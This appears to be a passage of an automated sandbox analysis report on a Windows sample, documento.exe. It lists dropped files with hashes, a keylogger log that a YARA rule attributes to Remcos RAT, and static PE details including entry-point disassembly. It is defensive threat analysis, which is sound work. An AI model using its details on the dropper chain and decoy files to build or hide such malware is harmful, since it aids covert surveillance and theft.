                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:false
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              C:\Users\user\AppData\Local\Temp\Deinotherium\Pugilist\Unreturnableness\Tapeta\Vulgare\hektowattens.txt

                                              Download File
                                              Process:C:\Users\user\Desktop\documento.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):541
                                              Entropy (8bit):4.233078036185589
                                              Encrypted:false
                                              SSDEEP:12:207ugGwsLDnF87kTJiB4V7SDjLWFk9LYO1JV87H68dGx+pSLWl:20igGJDnOATHSGkL71w7a8dJ
                                              MD5:87DA0589AA2102C1224D596AA149E56B
                                              SHA1:1E1CCE9146840B718221D8D69CB511A57AF9CCD9
                                              SHA-256:A4C9E26743D76D4B7D7C357DFABA14BC0EF918CE05BBC8472C1FE6E2CCB2392C
                                              SHA-512:04878E203A6D30CC6087A5781A4C8CB781B023938883BB7BF312FD504B70C9BF8256463112998D679C8A9686AF5C8D83DB840CB4913155D250A477DD7F8B2DE8
                                              Malicious:false
                                              Preview:scrams cocainist schizognathous montage nedskrivningstidspunkter drunks sceneteknikers charm diffuses dragonish lserettighederne..lyknsker konkluder cyclicality spaanskraberen kartoteksstyring antilabour sortebrdres,foraarssemestret inbond raaskitsen housewives alterable.foreskrive inspissation predine barderendes hootingly unpunishing unleading revolts unpennied idriftsttende fllesanlgget tailorizes..yverformer stroppens corallita dissensions.disenfranchisements skaalfrugterne cartooning unyttigere transfigurationen hairnet textronix.

                                              C:\Users\user\AppData\Local\Temp\fb53bhiv.doo.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\joefz3jg.x0w.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\k5sib43s.z3j.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\nxjimhd4.o1x.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\r5ifwb5w.l2g.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\rpm5w0gg.41f.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\to21uc1n.hla.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\vdb0uukp.cx1.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\xpryghvs.t4f.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\11HJN6AE1PGM5W0V1Q92.temp

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):6045
                                              Entropy (8bit):3.587715453442456
                                              Encrypted:false
                                              SSDEEP:96:H/hQCEO4IzqvsqvJCwoseGi7UH3iKi7UHzic:H/ivoseG3iKzic
                                              MD5:1A143DF4846C44F7154551DE43C8FA1C
                                              SHA1:26DE82C863C4E79667B3B3F9D87F5EB95B6F9876
                                              SHA-256:368DA88C81659E9B73235E351F31F01408DBB15A7C5D3C26D9D809C65763818C
                                              SHA-512:9A4E5456F0E3A692B615FC5CF1FBCCFC58D7777BCC0336FACB11F7374822278F9A62035A6BEE84C6F8827B6E0D168A5B578AF3367ADEFDD9AAA4DD5DB4623489
                                              Malicious:false
                                              Preview:...................................FL..................F.".. .....8.D................................................P.O. .:i.....+00.../C:\...................\.1......Xd.. PROGRA~3..D.......:...Xd.*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1......W.x. MICROS~1..@.......:...W.x*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......WC...Programs..f.......:...WC.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......W.v..WINDOW~1..R.......:.,.W.v*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2......W.v .WINDOW~2.LNK..Z.......:.,.W.v*....]....................W.i.n.d.o.w.s.

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZONHH8O5SKF4P1ZUPDII.temp

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):6045
                                              Entropy (8bit):3.587715453442456
                                              Encrypted:false
                                              SSDEEP:96:H/hQCEO4IzqvsqvJCwoseGi7UH3iKi7UHzic:H/ivoseG3iKzic
                                              MD5:1A143DF4846C44F7154551DE43C8FA1C
                                              SHA1:26DE82C863C4E79667B3B3F9D87F5EB95B6F9876
                                              SHA-256:368DA88C81659E9B73235E351F31F01408DBB15A7C5D3C26D9D809C65763818C
                                              SHA-512:9A4E5456F0E3A692B615FC5CF1FBCCFC58D7777BCC0336FACB11F7374822278F9A62035A6BEE84C6F8827B6E0D168A5B578AF3367ADEFDD9AAA4DD5DB4623489
                                              Malicious:false
                                              Preview:...................................FL..................F.".. .....8.D................................................P.O. .:i.....+00.../C:\...................\.1......Xd.. PROGRA~3..D.......:...Xd.*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1......W.x. MICROS~1..@.......:...W.x*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......WC...Programs..f.......:...WC.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......W.v..WINDOW~1..R.......:.,.W.v*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2......W.v .WINDOW~2.LNK..Z.......:.,.W.v*....]....................W.i.n.d.o.w.s.

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):6045
                                              Entropy (8bit):3.587715453442456
                                              Encrypted:false
                                              SSDEEP:96:H/hQCEO4IzqvsqvJCwoseGi7UH3iKi7UHzic:H/ivoseG3iKzic
                                              MD5:1A143DF4846C44F7154551DE43C8FA1C
                                              SHA1:26DE82C863C4E79667B3B3F9D87F5EB95B6F9876
                                              SHA-256:368DA88C81659E9B73235E351F31F01408DBB15A7C5D3C26D9D809C65763818C
                                              SHA-512:9A4E5456F0E3A692B615FC5CF1FBCCFC58D7777BCC0336FACB11F7374822278F9A62035A6BEE84C6F8827B6E0D168A5B578AF3367ADEFDD9AAA4DD5DB4623489
                                              Malicious:false
                                              Preview:...................................FL..................F.".. .....8.D................................................P.O. .:i.....+00.../C:\...................\.1......Xd.. PROGRA~3..D.......:...Xd.*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1......W.x. MICROS~1..@.......:...W.x*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......WC...Programs..f.......:...WC.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......W.v..WINDOW~1..R.......:.,.W.v*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2......W.v .WINDOW~2.LNK..Z.......:.,.W.v*....]....................W.i.n.d.o.w.s.

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF4b41c2.TMP (copy)

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):6045
                                              Entropy (8bit):3.587715453442456
                                              Encrypted:false
                                              SSDEEP:96:H/hQCEO4IzqvsqvJCwoseGi7UH3iKi7UHzic:H/ivoseG3iKzic
                                              MD5:1A143DF4846C44F7154551DE43C8FA1C
                                              SHA1:26DE82C863C4E79667B3B3F9D87F5EB95B6F9876
                                              SHA-256:368DA88C81659E9B73235E351F31F01408DBB15A7C5D3C26D9D809C65763818C
                                              SHA-512:9A4E5456F0E3A692B615FC5CF1FBCCFC58D7777BCC0336FACB11F7374822278F9A62035A6BEE84C6F8827B6E0D168A5B578AF3367ADEFDD9AAA4DD5DB4623489
                                              Malicious:false
                                              Preview:...................................FL..................F.".. .....8.D................................................P.O. .:i.....+00.../C:\...................\.1......Xd.. PROGRA~3..D.......:...Xd.*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1......W.x. MICROS~1..@.......:...W.x*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......WC...Programs..f.......:...WC.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......W.v..WINDOW~1..R.......:.,.W.v*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2......W.v .WINDOW~2.LNK..Z.......:.,.W.v*....]....................W.i.n.d.o.w.s.

                                              C:\Users\user\AppData\Roaming\mqerms.dat

                                              Download File
                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):558
                                              Entropy (8bit):3.4899131529345313
                                              Encrypted:false
                                              SSDEEP:12:6l6Dec0WQw0kPe5BWYUNvsvXdw0kCMF+0kFW+:6QSc0WPd4BWYsvWmdj+dFW+
                                              MD5:FB5CA8E146E6ED90F7A02C6E70BB4888
                                              SHA1:C2EEF757F67403734D161792A8088FE6CA0C3C41
                                              SHA-256:61504F9A8F29A6EA79BA2A193708CE63045EA5F248DCE70ECA783E3503BA79F9
                                              SHA-512:A47044F301B216CDA80145943F9AF90C84E679A226C7371528801F792DCD55B548A61010563E4A92AF7C15F25C291C5623D115036FB3CA470EDBC81B52EE6BFF
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\mqerms.dat, Author: Joe Security
                                              Preview:....[.2.0.2.4./.0.5./.0.1. .1.8.:.2.6.:.4.2. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.C.:.\.w.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l.\.v.1...0.\.p.o.w.e.r.s.h.e.l.l...e.x.e.].........[.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.].........[.A.d.m.i.n.i.s.t.r.a.t.o.r.:. .W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                              C:\Users\user\Documents\Illoyalitet.ini

                                              Download File
                                              Process:C:\Users\user\Desktop\documento.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):36
                                              Entropy (8bit):4.027719015921097
                                              Encrypted:false
                                              SSDEEP:3:VCHZRcY/dv:VCHZRcKt
                                              MD5:40ED5B8117EADCDE3752EC625327924B
                                              SHA1:68E109BDC088F9A20C4081661EB47618DF0838B2
                                              SHA-256:E6862EE9E8FA0B8FCC82CC21C62F46D8A7A80BB4CCF039E1119B5E322C17DE5A
                                              SHA-512:AD29FA5DC4BAD695B914356C83779B69C28167E8F7156564BB6C8FD5D4709E0BD6CE2D85F914F4BE7B81BF64E584D53033B82748039840047FA2800EB9AE9673
                                              Malicious:false
                                              Preview:[fagbogens]..tmesis=unguidableness..

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):6.013506782930841
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:documento.exe
                                              File size:833'309 bytes
                                              MD5:518c32edf768d3be4f268071e0722a0f
                                              SHA1:2f606e59b3900154094978a3c2dcc16a7addfd55
                                              SHA256:e7092eb28dc769559d0d9db50ef39b664ae5ec4ba76ac580c11dfbfa1c426290
                                              SHA512:b1ac6888caa22657fb0e2d44016186075cde37e3cf65a1ecce396eb04270900d9cd49c06b1a025215bb8ba134e22f9623549cd73e7896591d16769e8d201be3d
                                              SSDEEP:24576:H7/jxjjtjj9JIvxV7kVTwRLRRFHkW7C41jRPx:bhGvX45wRLNl1jRPx
                                              TLSH:4405E077F94085E0EC2E4E738A1FD57857257C274E48A64B71A8BB0EAFB6703181BC46
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L...p..V.................^...........0.......p....@

                                              File Icon

                                              Icon Hash:020035645d190103

                                              Static PE Info

                                              General

                                              Entrypoint:0x4030d9
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x567F8470 [Sun Dec 27 06:25:52 2015 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:076b06e6a65c9b7cca5a61be0cd82165

                                              Entrypoint Preview

                                              Instruction
                                              sub esp, 00000184h
                                              push ebx
                                              push esi
                                              push edi
                                              xor ebx, ebx
                                              push 00008001h
                                              mov dword ptr [esp+18h], ebx
                                              mov dword ptr [esp+10h], 004091B0h
                                              mov dword ptr [esp+20h], ebx
                                              mov byte ptr [esp+14h], 00000020h
                                              call dword ptr [004070A4h]
                                              call dword ptr [004070A0h]
                                              cmp ax, 00000006h
                                              je 00007FA408918FA3h
                                              push ebx
                                              call 00007FA40891BF11h
                                              cmp eax, ebx
                                              je 00007FA408918F99h
                                              push 00000C00h
                                              call eax
                                              push ebp
                                              push 004091A8h
                                              call 00007FA40891BE91h
                                              push 004091A0h
                                              call 00007FA40891BE87h
                                              push 00409194h
                                              call 00007FA40891BE7Dh
                                              push 00000009h
                                              call 00007FA40891BEE0h
                                              push 00000007h
                                              call 00007FA40891BED9h
                                              mov dword ptr [00423724h], eax
                                              call dword ptr [0040703Ch]
                                              push ebx
                                              call dword ptr [0040728Ch]
                                              mov dword ptr [004237D8h], eax
                                              push ebx
                                              lea eax, dword ptr [esp+38h]
                                              push 00000160h
                                              push eax
                                              push ebx
                                              push 0041ECE0h
                                              call dword ptr [00407178h]
                                              push 00409188h
                                              push 00422F20h
                                              call 00007FA40891BB07h
                                              call dword ptr [0040709Ch]
                                              mov ebp, 00429000h
                                              push eax
                                              push ebp
                                              call 00007FA40891BAF5h
                                              push ebx
                                              call dword ptr [00000058h]

                                              Rich Headers

                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x73e00xa0.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000x74258.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x70000x29c.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x5c5b0x5e0025f20353ff4dab35a62d1661fd51d448False0.6599900265957447data6.415883806471021IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x70000x12120x1400a99dc6e1e9123b9d8eb17a3b16908620False0.4169921875data4.933902523070607IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x90000x1a8180x400c329e2dbf8e92aedf63262846de2292bFalse0.6552734375data5.219575463223351IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .ndata0x240000x100000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x340000x742580x74400202599d69fcb7c01c5477f096da78c2aFalse0.2838079637096774data3.8544748251180585IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0x345980x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.23073793531970294
                                              RT_ICON0x765c00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.29760144327457705
                                              RT_ICON0x86de80x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.35447761194029853
                                              RT_ICON0x902900x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560EnglishUnited States0.3587593984962406
                                              RT_ICON0x96a780x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.37975970425138633
                                              RT_ICON0x9bf000x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.3780703826169107
                                              RT_ICON0xa01280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4371369294605809
                                              RT_ICON0xa26d00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4866322701688555
                                              RT_ICON0xa37780xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5205223880597015
                                              RT_ICON0xa46200x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5594262295081968
                                              RT_ICON0xa4fa80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6768953068592057
                                              RT_ICON0xa58500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.5950460829493087
                                              RT_ICON0xa5f180x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.35
                                              RT_ICON0xa65800x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.40895953757225434
                                              RT_ICON0xa6ae80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6471631205673759
                                              RT_ICON0xa6f500x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.4650537634408602
                                              RT_ICON0xa72380x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.5184426229508197
                                              RT_ICON0xa74200x130Device independent bitmap graphic, 32 x 64 x 1, image size 128EnglishUnited States0.6644736842105263
                                              RT_ICON0xa75500x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5675675675675675
                                              RT_ICON0xa76780xb0Device independent bitmap graphic, 16 x 32 x 1, image size 64EnglishUnited States0.6420454545454546
                                              RT_DIALOG0xa77280x100dataEnglishUnited States0.5234375
                                              RT_DIALOG0xa78280x11cdataEnglishUnited States0.6056338028169014
                                              RT_DIALOG0xa79480xc4dataEnglishUnited States0.5918367346938775
                                              RT_DIALOG0xa7a100x60dataEnglishUnited States0.7291666666666666
                                              RT_GROUP_ICON0xa7a700x11edataEnglishUnited States0.5804195804195804
                                              RT_VERSION0xa7b900x29cdataEnglishUnited States0.48353293413173654
                                              RT_MANIFEST0xa7e300x424XML 1.0 document, ASCII text, with very long lines (1060), with no line terminatorsEnglishUnited States0.5132075471698113

                                              Imports

                                              DLLImport
